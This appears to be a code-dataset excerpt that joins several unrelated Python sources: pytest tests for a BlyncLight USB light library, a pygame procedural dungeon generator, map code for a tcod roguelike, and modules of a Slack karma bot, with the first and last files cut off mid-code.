assert entry.get("vendor_id", None)
assert entry.get("product_id", None)
def test_blynclight_get_light(number_of_lights):
"""Test the BlyncLight.get_light() class method to ensure that it
returns a BlyncLight object if the specified light is available.
The test also makes sure BlyncLightNotFound is raised when a
nonexistent light is requested.
:param number_of_lights: integer fixture
"""
assert number_of_lights >= 0
if number_of_lights > 0:
assert isinstance(BlyncLight.get_light(), BlyncLight)
assert isinstance(BlyncLight.get_light(0), BlyncLight)
with pytest.raises(BlyncLightNotFound):
BlyncLight.get_light(number_of_lights)
return
# We get here if no lights are currently available
assert number_of_lights == 0
with pytest.raises(BlyncLightNotFound):
BlyncLight.get_light()
BlyncLight.get_light(0)
def test_blynclight_unknown_device():
"""Tests the BlyncLight.__init__ method to make sure that
BlyncLightUnknownDevice is raised if we feed it a bogus vendor
identifier.
"""
bogus = 0xFFFF
assert bogus not in EMBRAVA_VENDOR_IDS
with pytest.raises(BlyncLightUnknownDevice):
BlyncLight(bogus, bogus)
def test_blynclight_vendor(Light):
""":param light: BlyncLight fixture
Double check that the BlyncLight's vendor_id property is
in the list of the known Embrava vendor identifiers. This
check occurs in the BlyncLight __init__ so maybe not
needed here.
"""
assert Light.vendor_id in EMBRAVA_VENDOR_IDS
def test_blynclight_product_id(Light):
""":param Light: BlyncLight fixture
Double check that the BlyncLight's product_id property is
non-zero (it's a hidapi wildcard value).
"""
assert Light.product_id != 0
def test_blynclight_device(Light):
""":param Light: BlyncLight fixture
Check to make sure the BlyncLight's device property is not None.
"""
assert Light.device
def test_blynclight_length(Light):
""":param Light: BlyncLight fixture
Check to make sure the BlyncLight's length is COMMAND_LENGTH.
"""
assert len(Light) == COMMAND_LENGTH * 8
assert len(Light.bytes) == COMMAND_LENGTH
@pytest.mark.parametrize(
"field",
[
FieldToTest("immediate", 0, 0),
FieldToTest("immediate", 1, 1),
FieldToTest("red", 0xAA, 0xAA),
FieldToTest("blue", 0xBB, 0xBB),
FieldToTest("green", 0xCC, 0xCC),
FieldToTest("off", 0, 0),
FieldToTest("off", 1, 1),
FieldToTest("on", 0, 0),
FieldToTest("on", 1, 1),
FieldToTest("dim", 1, 1),
FieldToTest("dim", 0, 0),
FieldToTest("flash", 1, 1),
FieldToTest("flash", 0, 0),
FieldToTest("speed", 1, 1),
FieldToTest("speed", 2, 2),
FieldToTest("speed", 3, 3),
FieldToTest("music", 1, 1), # XXX not sure how many music values there are
FieldToTest("music", 0, 0),
FieldToTest("play", 1, 1),
FieldToTest("play", 0, 0),
FieldToTest("repeat", 1, 1),
FieldToTest("repeat", 0, 0),
FieldToTest("volume", 1, 1),
FieldToTest("volume", 0, 0),
FieldToTest("mute", 1, 1),
FieldToTest("mute", 0, 0),
],
)
def test_bitfield(field, Light):
""":param Light: BlyncLight fixture
:param field: FieldToTest fixture
Tests a BlyncLight field by setting the light's
field to value and then comparing the attribute's
value to the expected value.
"""
setattr(Light, field.name, field.given)
value = getattr(Light, field.name)
assert value == field.expected
def test_color_property_tuple(Light):
""":param Light: BlyncLight fixture
The BlyncLight color property is a synthetic property that
suspends device updates while the red, blue and green fields
are updated. Once the red, blue, and green fields are set
in-memory, updates to the hardware are re-enabled.
This test sets the color property using a three-tuple of 8-bit
integers, e.g.:
> light.color = (0xaa, 0xbb, 0xcc)
The color property getter is compared to the three-tuple and
the individual color fields are checked to make sure they
were updated with expected values.
"""
Light.color = (0xAA, 0xBB, 0xCC)
assert Light.color == (0xAA, 0xBB, 0xCC)
assert Light.red == 0xAA
assert Light.blue == 0xBB
assert Light.green == 0xCC
def test_color_property_hex(Light):
""":param light: BlyncLight fixture
The BlyncLight color property is a synthetic property that
suspends device updates while the red, blue and green fields
are updating. Once the red, blue, and green fields are set
in-memory, updates to the hardware are re-enabled.
This test sets the color property using a 24-bit integer:
> Light.color = 0x112233
The color property getter is compared to the expected three-tuple
and the individual color fields are checked to make sure they were
updated with expected values.
"""
Light.color = 0x112233
assert Light.color == (0x11, 0x22, 0x33)
assert Light.red == 0x11
assert Light.blue == 0x22
assert Light.green == 0x33
@pytest.mark.parametrize("starting_immediate", [True, False])
def test_updates_paused_context_manager(starting_immediate: bool, Light):
""":param light: BlyncLight fixture
By default, a BlyncLight object writes its in-memory
representation of the command word to the device whenever
a field is written. The updates_paused() method is a
context manager that will suspend updates to the device
for the duration of the context manager's execution.
This method sets the immediate field to a known value,
starts a context manager, checks that immediate is zero
and then checks that immediate is restored to its
original value when the context manager exits.
"""
Light.immediate = starting_immediate
assert Light.immediate == starting_immediate
with Light.updates_paused():
assert Light.immediate == False
assert Light.immediate == starting_immediate
def test_on_property(Light):
""":param light: BlyncLight fixture
The BlyncLight 'on' property is a synthetic negative logic accessor
for the 'off' field in the command word. It made more sense to me
to turn a light on with:
light.on = 1
instead of:
light.off = 0
Those statements are equivalent, the test makes sure that manipulating
'on' sets 'off' appropriately and vice-versa
"""
for value in [False, True]:
Light.off = value
assert Light.off == value
assert Light.on == (not value)
Light.on = value
assert Light.on == value
assert Light.off == (not value)
def test_bright_property(Light):
""":param light: Blynclight fixture
The BlyncLight 'bright' property is a synthetic opposite logic
accessor for the 'dim' field in the command word. It made more sense
to me to make the light bright with:
light.bright = 1
instead of
light.dim = 0
Those statements are equivalent, the test makes sure that manipulating
'bright' sets 'dim' appropriately and vice-versa.
"""
for value in [False, True]:
Light.dim = value
assert Light.dim == value
assert Light.bright == (not value)
Light.bright = value
assert Light.bright == value
assert Light.dim == (not value)
def test_open_same_device(number_of_lights):
""":param number_of_lights: integer fixture
Two BlyncLight objects cannot open the same device, so here we
test that BlyncLightInUse is raised when that is attempted. This
only works if there are physical lights to test against, which is
controlled with the number_of_lights fixture.
"""
if number_of_lights <= 0:
return
a_light = BlyncLight.get_light()
assert isinstance(a_light, BlyncLight)
with pytest.raises(BlyncLightInUse):
b_light = BlyncLight.get_light()
del a_light
c_light = BlyncLight.get_light()
assert isinstance(c_light, BlyncLight)
@pytest.mark.parametrize(
"field",
[
FieldToTest("red", 0xFF, 0),
FieldToTest("blue", 0xFF, 0),
FieldToTest("green", 0xFF, 0),
FieldToTest("off", 0, 1),
FieldToTest("dim", 1, 0),
FieldToTest("flash", 1, 0),
FieldToTest("speed", 1, 1),
FieldToTest("music", 1, 0),
FieldToTest("play", 1, 0),
FieldToTest("repeat", 1, 0),
FieldToTest("volume", 1, 0),
FieldToTest("mute", 1, 1),
],
)
def test_resetting_light(field, Light):
""":param Light: BlyncLight fixture
:param field: FieldToTest fixture
Dirties up the light and then resets() it to a known state.
Each time a field in the light is altered, reset() is called and
the reset field value compared to the expected value.
"""
setattr(Light, field.name, field.given)
Light.reset(flush=False)
value = getattr(Light, field.name)
assert value == field.expected
@pytest.mark.parametrize(
"propname",
[
"red",
"blue",
"green",
"off",
"dim",
"flash",
"speed",
"repeat",
"play",
"music",
"mute",
"volume",
],
)
def test_status_property(propname, Light):
""":param light: BlyncLight fixture
Confirms that the BlyncLight property 'status' is a
dictionary, that keys of the dictionary are those
enumerated by the commands property and that the
values of the commands are integers.
"""
status = Light.status
assert isinstance(status, dict)
assert propname in status
``` |
{
"source": "JnyJny/DungeonGenerator",
"score": 3
} |
#### File: JnyJny/DungeonGenerator/Dungeon.py
```python
import math
import random
import pygame
import pygame.color
## http://gamasutra.com/blogs/AAdonaac/20150903/252889/Procedural_Dungeon_Generation_Algorithm.php
## utility functions
def roundm(n,m):
rnd = lambda x: math.floor((x+m-1)/m)*m
try:
return [rnd(x) for x in n]
except TypeError:
return rnd(n)
def slope(p0,p1):
try:
m = (p1[1] - p0[1]) / (p1[0] - p0[0])
except ZeroDivisionError:
m = 0
return m
def collide_rooms(left,right):
'''
Collide rooms, allow them to share edges
'''
if left == right: # ignore self collisions
return False
return right.rect.inflate(-2,-2).colliderect(left.rect.inflate(-2,-2))
def collide_and_scatter_rooms(left,right):
'''
If the rooms collide, apply a velocity to one of them.
'''
if collide_rooms(left,right):
right.repulse(left)
return True
right.velocity *= 0
return False
def gridToScreen(count,spacing):
'''
Convert grid coordinates (counts) to screen coordinates
'''
return ((spacing+1)*count)+1
def screenToGrid(coord,spacing):
'''
Convert screen coordinates to grid coordinates
'''
return roundm(coord/(spacing+1),spacing)
def collide_with_voids(left,right):
'''
'''
return right.isVoid and collide_rooms(left,right)
def snap_rect_to_grid(rect,gridSpacing):
'''
'''
grid = gridSpacing+1
rect.x = roundm(rect.x,grid)
rect.y = roundm(rect.y,grid)
rect.w = roundm(rect.w,grid)
rect.h = roundm(rect.h,grid)
## classes
class Room(pygame.sprite.Sprite):
_id = 0
@classmethod
def fromRect(cls,rect,gridSpacing):
'''
Create a new room using rect for it's bounds.
'''
r = Room(gridSpacing=gridSpacing)
r.rect = rect
return r
@classmethod
def nextID(cls):
'''
Return the next unique room identifier.
'''
i = cls._id
cls._id += 1
return i
def __init__(self,x=0,y=0,width=1,height=1,gridSpacing=1):
'''
x, y : dungeon surface coords
width, height : in grid units
gridSpacing : interior diameter of grid unit
'''
super(Room,self).__init__()
self.id = Room.nextID()
self.width = width
self.height = height
self.gridSpacing = gridSpacing
self.velocity = pygame.math.Vector2(0,0)
self.image = pygame.Surface((gridToScreen(width,gridSpacing),
gridToScreen(height,gridSpacing)))
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
self.neighbors = []
self.snapToGrid()
self.render()
def __repr__(self):
return 'Room(%d,%s,velocity=%s)' % (self.id,self.rect,self.velocity)
@property
def fgcolor(self):
return Dungeon.COLORS[self.layer][0]
@property
def bgcolor(self):
return Dungeon.COLORS[self.layer][1]
@property
def layer(self):
try:
return self._layer
except AttributeError:
self._layer = Dungeon.VOIDS
return self._layer
@layer.setter
def layer(self,newLayer):
self._layer = newLayer
@property
def vector(self):
try:
return self._vector
except AttributeError:
self._vector = pygame.math.Vector2(self.rect.center)
return self._vector
@property
def isVoid(self):
return self.layer == Dungeon.VOIDS
@property
def isHall(self):
return self.layer == Dungeon.HALLS
@property
def isMainRoom(self):
return self.layer == Dungeon.MAIN_ROOMS
def centerbox(self,other):
x = min(self.rect.x,other.rect.x)
y = min(self.rect.y,other.rect.y)
w = max(self.rect.x,other.rect.x) - x
h = max(self.rect.y,other.rect.y) - y
return pygame.rect.Rect(x,y,w,h)
def distance_to(self,other):
return self.vector.distance_to(other.vector)
def snapToGrid(self,grid=None):
'''
Aligns the room to the specified grid.
'''
if grid is None:
grid = self.gridSpacing+1
self.rect.x = roundm(self.rect.x,grid)
self.rect.y = roundm(self.rect.y,grid)
def _goodNeighbor(self,other):
if (self == other):
return False
if self.neighbors.count(other) != 0:
return False
return True
def pickClosestNeighbors(self,potentials,limit,reset=False):
'''
potentials: list of Rooms
limit: integer specifying upper limit of rooms to pick as neighbors
reset: clear out neighbors list before finding more neighbors
'''
if reset:
self.neighbors = []
# build a neighborhood dictionary keyed on distance between
# the target room and the potential neighbors. skip rooms
# that aren't good neighbors.
neighborhood = {}
for p in potentials:
if self._goodNeighbor(p):
neighborhood.setdefault(self.distance_to(p),p)
newNeighbors = [neighborhood[d] for d in sorted(neighborhood)][:limit]
self.neighbors.extend(newNeighbors)
return self.neighbors
def update(self,time):
self.move(time)
self.snapToGrid()
def move(self,time):
self.rect.x += self.velocity.x
self.rect.y += self.velocity.y
def repulse(self,other):
dx = (self.rect.x - other.rect.x)
dy = (self.rect.y - other.rect.y)
self.velocity.x += dx + random.randint(-10,10) * random.randint(-1,1)
self.velocity.y += dy + random.randint(-10,10) * random.randint(-1,1)
def render(self,fgcolor=None,bgcolor=None,width=1):
'''
Draw the room with the specified colors and line width.
'''
if fgcolor is None:
fgcolor = self.fgcolor
if bgcolor is None:
bgcolor = self.bgcolor
self.image.fill(bgcolor)
grid = pygame.rect.Rect(0,0,self.gridSpacing+2,self.rect.height)
for grid.x in range(0,self.rect.width,(self.gridSpacing+1)*2):
pygame.draw.rect(self.image,fgcolor,grid,width)
grid = pygame.rect.Rect(0,0,self.rect.width,self.gridSpacing+2)
for grid.y in range(0,self.rect.height,(self.gridSpacing+1)*2):
pygame.draw.rect(self.image,fgcolor,grid,width)
pygame.draw.rect(self.image,fgcolor,grid,width)
class Dungeon(pygame.sprite.RenderUpdates):
# room types
VOIDS = 0
HALLS = 5
MAIN_ROOMS=10
# default room colors by type
COLORS = { VOIDS: ((127,127,127),(0,0,0)), # fg,bg
HALLS: ((255,255,255),(0,0,255)),
MAIN_ROOMS:((255,255,255),(255,0,0))}
@classmethod
def generate(cls,width,height,maxRoomDimension=10,gridSpacing=8,seedRooms=150):
'''
Creates a new dungeon.
'''
dungeon = cls(width,height,
maxRoomDimension,
maxRoomDimension,
gridSpacing)
for x in range(0,seedRooms):
dungeon.addRandomRoom(dungeon.radius/5) # XXX magic number
dungeon.spreadOutRooms()
dungeon.centerIn(pygame.rect.Rect(0,0,dungeon.width,dungeon.height))
for room in dungeon.pickMainRooms(1.25): # XXX magic number
dungeon.setRoomType(room,Dungeon.MAIN_ROOMS)
dungeon.inFillWithVoids()
dungeon.findMainRoomNeighbors()
dungeon.connectHallsToRooms()
return dungeon
def __init__(self,width,height,maxRoomWidth,maxRoomHeight,gridSpacing=8):
'''
width, height : pixels
maxRoomWidth : grid units
maxRoomHeight : grid units
gridSpacing : grid void distance
'''
self.width = width
self.height = height
self.gridSpacing = gridSpacing
self.rooms = pygame.sprite.LayeredUpdates()
self.bgcolor = (80,80,80)
self.maxWidth = maxRoomWidth
self.maxHeight = maxRoomHeight
self.rect = pygame.rect.Rect(0,0,self.width,self.height)
@property
def font(self):
try:
return self._font
except AttributeError:
pygame.sysfont.initsysfonts()
self._font = pygame.sysfont.SysFont(None,14)
return self._font
@property
def bound(self):
rooms = self.rooms.sprites()
if len(rooms):
u = rooms[0].rect.unionall([r.rect for r in rooms[1:]])
else:
u = None
return u
@property
def radius(self):
return min(self.width,self.height) / 2
@property
def mainRooms(self):
return self.rooms.get_sprites_from_layer(self.MAIN_ROOMS)
@property
def halls(self):
return self.rooms.get_sprites_from_layer(self.HALLS)
@property
def voids(self):
return self.rooms.get_sprites_from_layer(self.VOIDS)
def setRoomType(self,room,layer,render=True):
'''
Convenience function for moving sprites between layers.
Assumes room is already a member of self.rooms; this is not checked.
'''
self.rooms.change_layer(room,layer)
room.layer = layer
if render:
room.render()
def centerIn(self,rect):
dx = rect.center[0] - self.bound.center[0]
dy = rect.center[1] - self.bound.center[1]
for room in self.rooms.sprites():
room.rect.x += dx
room.rect.y += dy
def addRandomRoom(self,radius=None):
'''
Creates a new random room in a circle defined by radius whose origin
is the center of the dungeon.
'''
if radius is None:
radius = self.radius
w = random.randint(1,self.maxWidth)
h = random.randint(1,self.maxHeight)
t = 2.0 * math.pi * random.random()
u = random.random() + random.random()
if u > 1:
r = 2 - u
else:
r = u
x = radius * r * math.cos(t) + self.rect.center[0]
y = radius * r * math.sin(t) + self.rect.center[1]
self.rooms.add(Room(x,y,w,h,self.gridSpacing),layer=self.VOIDS)
def pickMainRooms(self,pickRatio):
'''
Determines the average width and height of all the rooms in the dungeon.
Typically called before inFillWithVoids to avoid skewing the results with
a ton of 1x1 rooms. Rooms whose width and height are both at least pickRatio
times the average are picked to be "Main" rooms. Function returns a list of rooms picked.
'''
rooms = self.rooms.sprites()
nrooms = len(rooms)
pick_w = pickRatio * (sum([r.rect.w for r in rooms]) / nrooms)
pick_h = pickRatio * (sum([r.rect.h for r in rooms]) / nrooms)
for room in rooms:
if room.rect.width < pick_w or room.rect.height < pick_h:
self.setRoomType(room,Dungeon.VOIDS)
continue
self.setRoomType(room,Dungeon.MAIN_ROOMS)
return self.mainRooms
def findMainRoomNeighbors(self,maxEdges=2):
'''
Tries to connect rooms by picking their maxEdges nearest neighbors.
Most of the time this results in a connected graph, but sometimes it
doesn't. A full Delaunay triangulation would result in a fully connected
graph.
'''
rooms = self.mainRooms
for room in rooms:
room.pickClosestNeighbors(rooms,maxEdges)
def connectHallsToRooms(self,hallwidth=3):
'''
Once main rooms have found their neighbors, we can turn surrounding void
rooms into hallways with width "hallwidth".
'''
w = gridToScreen(hallwidth,self.gridSpacing)
for room in self.mainRooms:
for neighbor in room.neighbors:
target = room.centerbox(neighbor)
collider = Room.fromRect(target.inflate(w,w),self.gridSpacing)
collider.snapToGrid()
outers = pygame.sprite.spritecollide(collider,self.rooms,False,
collide_with_voids)
collider = Room.fromRect(target.inflate(-w,-w),self.gridSpacing)
collider.snapToGrid()
inners = pygame.sprite.spritecollide(collider,self.rooms,False,
collide_with_voids)
for v in outers:
if v in inners and (v.width == 1) and (v.height == 1):
continue
self.setRoomType(v,Dungeon.HALLS)
v.render()
def inFillWithVoids(self,width=1,height=1,bounds=None):
'''
Fills the bounds rectangle with unit rooms and then collides those
rooms with main rooms and other voids. The unit rooms that collide
are removed and the non-colliders are added to the dungeon.
'''
if bounds is None:
bounds = self.bound
voids = pygame.sprite.Group()
xfin = bounds.x + bounds.width - (self.gridSpacing+1)
yfin = bounds.y + bounds.height - (self.gridSpacing+1)
for x in range(bounds.x,xfin,self.gridSpacing+1):
for y in range(bounds.y,yfin,self.gridSpacing+1):
r = Room(x,y,gridSpacing=self.gridSpacing)
voids.add(r)
pygame.sprite.groupcollide(voids,self.rooms,True,False,collide_rooms)
self.rooms.add(voids,layer=Dungeon.VOIDS)
def stopRooms(self):
'''
Zeros the velocity of all rooms in the dungeon.
'''
for room in self.rooms.sprites():
room.velocity *= 0
room.snapToGrid()
def spreadOutRooms(self,time=0,surface=None):
'''
Collides rooms with a 'collide and scatter' function that will cause
rooms to separate from one another.
'''
done = False
rooms = self.rooms.sprites()
while not done:
self.rooms.update(time)
done = True
for room in rooms:
room.render()
collisions = pygame.sprite.spritecollide(room,rooms,False,
collide_and_scatter_rooms)
if len(collisions):
if surface:
room.render(bgcolor=(255,0,0))
done = False
break
if surface and not done:
self.draw(surface,True)
return False
self.stopRooms()
return True
def update(self,time):
'''
'''
self.rooms.update(time)
def draw(self,surface,drawBounds=True):
'''
'''
surface.fill(self.bgcolor)
rects = self.rooms.draw(surface)
if drawBounds:
try:
pygame.draw.rect(surface,(0,128,0,0.1),self.bound.inflate(2,2),1)
except:
pass
return rects
if __name__ == '__main__':
from pygame.locals import *
pygame.init()
screen_size = (1024,1024)
screen = pygame.display.set_mode(screen_size,0,32)
pygame.display.set_caption('Dungeon Generation Demo')
dungeon = Dungeon.generate(screen_size[0],screen_size[1])
while True:
dungeon.update(0)
dungeon.draw(screen)
pygame.display.update()
pressed = pygame.key.get_pressed()
if pressed[K_ESCAPE]:
exit()
``` |
{
"source": "JnyJny/hackstar",
"score": 2
} |
#### File: hackstar/hackstar/cli.py
```python
import click
from .engine import TheGame
@click.command()
def cli():
"""
"""
the_game = TheGame()
the_game.run()
```
#### File: hackstar/maps/map.py
```python
import tcod
import random
from loguru import logger
from .tile import Tile
from .rect import Rect
from ..util import random_xy
from ..monsters import random_monster
# from ..items import random_item
class Map:
def __init__(self, width, height, player) -> None:
self.w = width
self.h = height
self.player = player
self.needs_fov_recompute = True
self.dig_dungeon()
self.add_monsters()
@property
def tiles(self):
try:
return self._tiles
except AttributeError:
pass
self._tiles = [[Tile(x, y, True) for y in range(self.h)] for x in range(self.w)]
return self._tiles
@property
def rooms(self) -> list:
"""List of rooms managed by the map. Left over from dig_dungeons.
"""
try:
return self._rooms
except AttributeError:
pass
self._rooms = []
return self._rooms
@property
def entities(self) -> list:
"""List of entities in the map.
"""
try:
return self._entities
except AttributeError:
pass
self._entities = []
return self._entities
def entity_at(self, coords):
"""Searches the entities list for an etity at the given
coordinates in the map. The first matching entity is
returned, otherwise None is returned for no matches.
:param Tuple[int,int] coords:
:return .Entity subclass:
"""
for entity in self.entities:
if entity.position == coords:
return entity
return None
def populate_room(self, room, max_monsters: int) -> list:
"""Adds a random number of monsters up to max_monsters
to the supplied room.
:param .maps.Rect room:
:param int max_monsters:
:return: list of monsters placed
"""
n_monsters = random.randint(0, max_monsters)
# check that the n_monsters <= number of tiles in room
x_range = (room.x + 1, room.x1 - 1)
y_range = (room.y + 1, room.y1 - 1)
monsters = [random_monster() for _ in range(n_monsters)]
for monster in monsters:
logger.debug(f"Monster: {monster!r}")
for monster in monsters:
monster.position = random_xy(x_range, y_range)
while self.entity_at(monster.position):
logger.debug(f"OCCUPADO @ {monster.position}")
monster.position = random_xy(x_range, y_range)
self.entities.append(monster)
logger.debug(f"Placed monster {monster!r}")
return monsters
def add_monsters(self, max_monsters_per_room=3) -> None:
"""
"""
logger.info("Adding monsters to rooms")
for room in self.rooms:
self.populate_room(room, max_monsters_per_room)
def add_loot(self, max_loot_per_room=2) -> None:
"""
"""
logger.info("Adding loot to rooms")
def dig_dungeon(self, max_rooms=11, min_size=6, max_size=10):
"""
"""
min_x, max_x = 0, self.w - 1
min_y, max_y = 0, self.h - 1
for _ in range(max_rooms):
room = Rect.random(min_size, max_size, min_x, max_x, min_y, max_y)
for other_room in self.rooms:
if room in other_room:
break
else:
logger.debug(f"Room: {room}")
self.dig_room(room)
if len(self.rooms) == 0:
self.player.position = room.center
self.entities.append(self.player)
assert len(self.entities) == 1
else:
room_x, room_y = room.center
other_x, other_y = self.rooms[-1].center
if random.randint(0, 1) == 1:
self.dig_h_hall(other_x, room_x, other_y)
self.dig_v_hall(other_y, room_y, room_x)
else:
self.dig_v_hall(other_y, room_y, other_x)
self.dig_h_hall(other_x, room_x, room_y)
self.rooms.append(room)
def dig_room(self, room) -> None:
"""
"""
for x in room.xrange():
for y in room.yrange():
try:
tile = self.tiles[x][y]
tile.blocked = False
tile.opaque = False
except IndexError as err:
logger.debug(f"{err} x={x} y={y}")
def dig_h_hall(self, x0, x1, y):
"""
"""
for x in range(min(x0, x1), max(x0, x1) + 1):
t = self.tiles[x][y]
t.blocked = False
t.opaque = False
def dig_v_hall(self, y0, y1, x):
"""
"""
for y in range(min(y0, y1), max(y0, y1) + 1):
t = self.tiles[x][y]
t.blocked = False
t.opaque = False
def random_rooms(self, count=4):
"""
"""
for _ in range(count):
x = random.randint(1, self.w - 2)
y = random.randint(1, self.h - 2)
w = random.randint(4, 10)
h = random.randint(4, 10)
room = Rect(x, y, w, h)
self.dig_room(room)
def is_blocked(self, x: int, y: int) -> bool:
"""
"""
return self.tiles[x][y].blocked
def is_opaque(self, x: int, y: int) -> bool:
"""
"""
return self.tiles[x][y].opaque
def __iter__(self):
self._x = 0
self._y = 0
return self
def __next__(self):
tile = self.tiles[self._x][self._y]
self._x += 1
if self._x >= self.w:
self._x = 0
self._y += 1
if self._y >= self.h:
raise StopIteration()
return tile
@property
def fov_map(self):
"""tcod.Map
"""
try:
return self._fov_map
except AttributeError:
pass
self._fov_map = tcod.map_new(self.w, self.h)
for tile in self:
tcod.map_set_properties(
self._fov_map, tile.x, tile.y, not tile.opaque, not tile.blocked
)
return self._fov_map
def in_fov(self, x: int, y: int) -> bool:
"""
"""
return tcod.map_is_in_fov(self.fov_map, x, y)
def update(self, radius, light_walls=True, algorithm=0) -> None:
"""
"""
if self.needs_fov_recompute:
logger.debug(
f"Recomputing FOV for {self.player.position} radius {radius} algorithm:{algorithm}"
)
tcod.map_compute_fov(
self.fov_map,
self.player.x,
self.player.y,
radius,
light_walls,
algorithm,
)
def draw(self, console: int, colors: dict, force: bool = False) -> None:
"""
"""
if self.needs_fov_recompute or force:
for tile in self:
visible = tcod.map_is_in_fov(self.fov_map, tile.x, tile.y)
# XXX tile should take more responsibility for what its color
# is depending on its configuration.
#
color = 0x000000
if tile.is_wall:
color = colors["light_wall"] if visible else colors["dark_wall"]
if tile.is_floor:
color = colors["light_grnd"] if visible else colors["dark_grnd"]
tcod.console_set_char_background(
console, tile.x, tile.y, color, tcod.BKGND_SET
)
self.needs_fov_recompute = False
for entity in sorted(self.entities, key=lambda x: x.kind.value):
entity.draw(console)
tcod.console_set_default_foreground(console, tcod.white)
tcod.console_print_ex(
console,
1,
self.h - 2,
tcod.BKGND_NONE,
tcod.LEFT,
f"HP: {self.player.hp:02d}/{self.player.max_hp:02d}",
)
```
#### File: hackstar/maps/tile.py
```python
class Tile:
"""
"""
def __init__(self, x, y, blocked: bool, opaque: bool = None):
self.x = x
self.y = y
self.blocked = blocked
if opaque is None:
opaque = blocked
self.opaque = opaque
@property
def is_wall(self):
return self.blocked and self.opaque
@property
def is_floor(self):
return not self.blocked
``` |
{
"source": "JnyJny/karmabot",
"score": 3
} |
#### File: karmabot/commands/add.py
```python
from karmabot import slack
MSG = """Hey {username}, so you want to propose a new command eh?
Awesome! Here are the steps:
1. Karmabot repo: https://github.com/pybites/karmabot
2. Fork the repo, make your branch.
3. Add your command script under the commands/ subdirectory.
4. Open a PR of your branch against PyBites repo.
5. Bob/Julian/Community to approve and merge it in.
Here is a walk-through video:
https://www.youtube.com/watch?v=Yx9qYl6lmzM&t=2s
Thanks!
"""
def add_command(**kwargs):
"""Instructions how to propose a new bot command"""
user_id = kwargs.get("user_id")
if not user_id:
return None
slack_id = slack.format_user_id(user_id)
return MSG.format(username=slack_id)
```
#### File: karmabot/commands/help.py
```python
def create_commands_table(commands):
"""Print this help text"""
ret = "\n".join(
[
"{:<30}: {}".format(name, func.__doc__.strip())
for name, func in sorted(commands.items())
]
)
return "```{}```".format(ret)
```
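A quick sketch of what `create_commands_table` produces, assuming the function above is in scope; the command functions below are fabricated stand-ins whose docstrings supply the description column:
```python
def fake_add(**kwargs):
    """Instructions how to propose a new bot command"""

def fake_help(**kwargs):
    """Print this help text"""

table = create_commands_table({"add": fake_add, "help": fake_help})
print(table)
# Each command name is left-aligned in a 30-character column followed by its
# docstring, and the whole table is wrapped in triple backticks for Slack.
```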
#### File: karmabot/commands/welcome.py
```python
from random import choice
import karmabot
# thanks Erik!
WELCOME_MSG = """Welcome {user} ++!
Introduce yourself in #general if you like ...
- What do you use Python for?
- What is your day job?
- And: >>> random.choice(pybites_init_questions)
{welcome_question}
Although you will meet some awesome folks here, you can also talk to me :)
Type `help` here to get started ...
Enjoy PyBites Slack and keep calm and code in Python!
@pybob and @julian.sequeira
"""
# some Pythonic welcome questions
WELCOME_QUESTIONS = """How did you use Python for the first time?
What is your favorite Python module?
What was the last Python book you read?
Did you go to Pycon? If so what was the best you got out of it?
Do you have any particular interest or hobby?
How did you hear about PyBites?
What is your favorite software principle of the Zen of Python (import this)?
Are you a 100 Days of Code survivor or planning to take the challenge?
What is your favorite TV show, movie or book?
How many Christopher Nolan movies did you see? If > 1 favorite?
If you were to build a chatbot what would it do?
AI, hype or life threatening?
How do you currently use Python?
Are you teaching Python or inspire to do so?
Australia or Spain?
Star Trek or Star Wars?
Tabs or spaces? (be careful!)
Do you use test drive development (TDD)?
What is your favorite editor?
What other programming languages do you know and/or use?"""
def welcome_user(user_id: str) -> str:
"""Welcome a new PyBites community member"""
questions = WELCOME_QUESTIONS.split("\n")
random_question = choice(questions) # noqa: S311
slack_id = karmabot.slack.format_user_id(user_id)
return WELCOME_MSG.format(user=slack_id, welcome_question=random_question)
```
#### File: src/karmabot/karma.py
```python
import logging
from karmabot.db import db_session
from karmabot.db.karma_transaction import KarmaTransaction
from karmabot.db.karma_user import KarmaUser
from karmabot.settings import KARMABOT_ID, MAX_POINTS, SLACK_CLIENT, SLACK_ID_FORMAT
from karmabot.slack import get_available_username, get_channel_name, post_msg
class GetUserInfoException(Exception):
pass
def _parse_karma_change(karma_change):
user_id, voting = karma_change
if SLACK_ID_FORMAT.match(user_id):
receiver = user_id.strip("<>@")
else:
receiver = user_id.strip(" #").lower() # ?
points = voting.count("+") - voting.count("-")
return receiver, points
def process_karma_changes(message, karma_changes):
for karma_change in karma_changes:
receiver_id, points = _parse_karma_change(karma_change)
try:
karma = Karma(
giver_id=message.user_id,
receiver_id=receiver_id,
channel_id=message.channel_id,
)
except GetUserInfoException:
return
try:
text = karma.change_karma(points)
except Exception as exc:
text = str(exc)
post_msg(message.channel_id, text)
class Karma:
def __init__(self, giver_id, receiver_id, channel_id):
self.session = db_session.create_session()
self.giver = self.session.query(KarmaUser).get(giver_id)
self.receiver = self.session.query(KarmaUser).get(receiver_id)
self.channel_id = channel_id
self.last_score_maxed_out = False
if not self.giver:
self.giver = self._create_karma_user(giver_id)
if not self.receiver:
self.receiver = self._create_karma_user(receiver_id)
def _create_karma_user(self, user_id):
user_info = SLACK_CLIENT.api_call("users.info", user=user_id)
error = user_info.get("error")
if error is not None:
logging.info(f"Cannot get user info for {user_id} - error: {error}")
raise GetUserInfoException
slack_id = user_info["user"]["id"]
username = get_available_username(user_info)
new_user = KarmaUser(user_id=slack_id, username=username)
self.session.add(new_user)
self.session.commit()
logging.info(f"Created new KarmaUser: {repr(new_user)}")
return new_user
def _calc_final_score(self, points):
if abs(points) > MAX_POINTS:
self.last_score_maxed_out = True
return MAX_POINTS if points > 0 else -MAX_POINTS
else:
self.last_score_maxed_out = False
return points
def _create_msg_bot_self_karma(self, points) -> str:
if points > 0:
text = (
f"Thanks {self.giver.username} for the extra karma"
f", my karma is {self.receiver.karma_points} now"
)
else:
text = (
f"Not cool {self.giver.username} lowering my karma "
f"to {self.receiver.karma_points}, but you are probably"
f" right, I will work harder next time"
)
return text
def _create_msg(self, points):
receiver_name = self.receiver.username
poses = "'" if receiver_name.endswith("s") else "'s"
action = "increase" if points > 0 else "decrease"
text = (
f"{receiver_name}{poses} karma {action}d to "
f"{self.receiver.karma_points}"
)
if self.last_score_maxed_out:
text += f" (= max {action} of {MAX_POINTS})"
return text
def _save_transaction(self, points):
transaction = KarmaTransaction(
giver_id=self.giver.user_id,
receiver_id=self.receiver.user_id,
channel=get_channel_name(self.channel_id),
karma=points,
)
self.session.add(transaction)
self.session.commit()
finished_transaction = (
self.session.query(KarmaTransaction)
.order_by(KarmaTransaction.id.desc())
.first()
)
logging.info(repr(finished_transaction))
def change_karma(self, points):
""" Updates Karma in the database """
